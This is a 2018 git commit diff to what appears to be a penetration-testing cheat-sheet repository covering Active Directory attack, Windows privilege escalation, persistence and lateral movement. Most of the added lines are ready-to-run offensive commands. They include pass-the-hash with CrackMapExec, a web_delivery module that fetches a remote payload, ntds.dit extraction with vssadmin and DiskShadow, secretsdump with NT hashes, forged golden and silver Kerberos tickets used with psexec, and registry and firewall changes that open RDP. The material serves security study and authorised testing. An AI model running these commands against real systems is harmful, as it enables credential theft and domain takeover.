PassTheTicket + OpenShare + Tools(CME example)

This commit is contained in:
Swissky 2018-07-08 20:03:40 +02:00
parent 4cf28496e0
commit cdc3adee51
5 changed files with 98 additions and 21 deletions

View File

@ -4,10 +4,12 @@
* [Tools](#tools) * [Tools](#tools)
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise) * [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability) * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
* [Open Shares](#open-shares)
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
* [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit) * [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
* [Golden Tickets](#golden-tickets) * [Password in AD User comment](#password-in-ad-user-comment)
* [Silver Tickets](#silver-tickets) * [Golden Tickets](#passtheticket-golden-tickets)
* [Silver Tickets](#passtheticket-silver-tickets)
* [Trust Tickets](#trust-tickets) * [Trust Tickets](#trust-tickets)
* [Kerberoast](#kerberoast) * [Kerberoast](#kerberoast)
* [Pass-the-Hash](#pass-the-hash) * [Pass-the-Hash](#pass-the-hash)
@ -33,6 +35,7 @@ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
``` ```
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
```powershell ```powershell
@ -55,6 +58,20 @@ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
``` ```
## Open Shares
```powershell
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
ls # list files
cd
get # download files
put # replace a file
```
Mount a share
```powershell
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
```
### GPO - Pivoting with Local Admin & Passwords in SYSVOL ### GPO - Pivoting with Local Admin & Passwords in SYSVOL
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
@ -106,6 +123,21 @@ vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
``` ```
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
```powershell
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\
```
**Using vssadmin**
```powershell
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
```
**Using DiskShadow (a Windows signed binary)** **Using DiskShadow (a Windows signed binary)**
```powershell ```powershell
diskshadow.txt contains : diskshadow.txt contains :
@ -118,6 +150,7 @@ delete shadows volume %someAlias%
reset reset
then: then:
NOTE - must be executed from C:\Windows\System32
diskshadow.exe /s c:\diskshadow.txt diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak reg.exe save hklm\system c:\exfil\system.bak
@ -126,11 +159,12 @@ reg.exe save hklm\system c:\exfil\system.bak
**Extract hashes from ntds.dit** **Extract hashes from ntds.dit**
then you need to use secretsdump to extract the hashes then you need to use secretsdump to extract the hashes
```c ```c
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
``` ```
secretsdump also works remotely secretsdump also works remotely
```c ```c
./secretsdump.py IP administrator@domain -use-vss ./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
``` ```
@ -150,7 +184,7 @@ CrackMapExec module
cme smb 10.10.0.202 -u username -p password --ntds vss cme smb 10.10.0.202 -u username -p password --ntds vss
``` ```
## Password in AD User comment ### Password in AD User comment
```powershell ```powershell
enum4linux | grep -i desc enum4linux | grep -i desc
There are 3-4 fields that seem to be common in most AD schemas: There are 3-4 fields that seem to be common in most AD schemas:
@ -158,7 +192,7 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
``` ```
### Golden Tickets ### PassTheTicket Golden Tickets
Forge a TGT, require krbtgt key Forge a TGT, require krbtgt key
Mimikatz version Mimikatz version
@ -187,11 +221,36 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck
kerberos_ticket_list kerberos_ticket_list
``` ```
### Silver Tickets Using a ticket on Linux
Forge a TGS, require machine accound password (key) from the KDC ```powershell
Convert the ticket kirbi to ccache with kekeo
misc::convert ccache ticket.kirbi
Alternatively you can use ticketer from Impacket
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
export KRB5CCNAME=/home/user/ticket.ccache
cat $KRB5CCNAME
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100
```
### PassTheTicket Silver Tickets
Forging a TGS require machine accound password (key) from the KDC
```powershell
Create a ticket for the service
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
Then use the same steps as a Golden ticket
misc::convert ccache ticket.kirbi
export KRB5CCNAME=/home/user/ticket.ccache
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100
```
### Trust Tickets ### Trust Tickets
TODO
### Kerberoast ### Kerberoast
```c ```c
@ -275,6 +334,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) ### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed : `wmic qfe list | find "3139914"`
``` ```
Powershell: Powershell:
https://www.exploit-db.com/exploits/39719/ https://www.exploit-db.com/exploits/39719/
@ -314,5 +374,6 @@ net group "Domain Admins" hacker2 /add /domain
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) * [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)

View File

@ -56,3 +56,4 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
## Thanks to ## Thanks to
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)

View File

@ -92,28 +92,29 @@ net share
## Looting for passwords ## Looting for passwords
Search for file contents ### Search for file contents**
```powershell ```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
``` ```
Search for a file with a certain filename ### Search for a file with a certain filename
```powershell ```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
``` ```
Search the registry for key names ### Search the registry for key names
```powershell ```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K
``` ```
Read a value of a certain sub key ### Read a value of a certain sub key
```powershell ```powershell
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
``` ```
Password in unattend.xml ### Password in unattend.xml
Location of the unattend.xml files
```powershell ```powershell
C:\unattend.xml C:\unattend.xml
C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend.xml
@ -121,6 +122,8 @@ C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml C:\Windows\system32\sysprep\sysprep.xml
``` ```
Example content
```powershell ```powershell
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64"> <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon> <AutoLogon>
@ -182,4 +185,6 @@ powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadS
## Thanks to ## Thanks to
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
* [TOP10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)

View File

@ -68,16 +68,20 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
``` ```
## RDP Remote Desktop Protocol (Impacket) ## RDP Remote Desktop Protocol (Impacket)
``` ```powershell
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
``` ```
Note: you may need to enable it with the following command Note: you may need to enable it with the following command
``` ```powershell
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
``` ```
or with psexec(sysinternals) or with psexec(sysinternals)
``` ```powershell
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
``` ```
@ -86,6 +90,12 @@ For Server 2012 R2, Win8.1+
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
``` ```
with Metasploit
```powershell
run getgui -u admin -p 1234
```
## Netuse (Windows) ## Netuse (Windows)
``` ```
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r

View File

@ -1,7 +1,7 @@
# Payloads All The Things # Payloads All The Things
A list of useful payloads and bypasses for Web Application Security. A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques ! Feel free to improve with your payloads and techniques !
I <3 pull requests :) You can also contribute with a beer IRL or a [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky) I <3 pull requests :) You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
Every section contains: Every section contains:
- README.md - vulnerability description and how to exploit it - README.md - vulnerability description and how to exploit it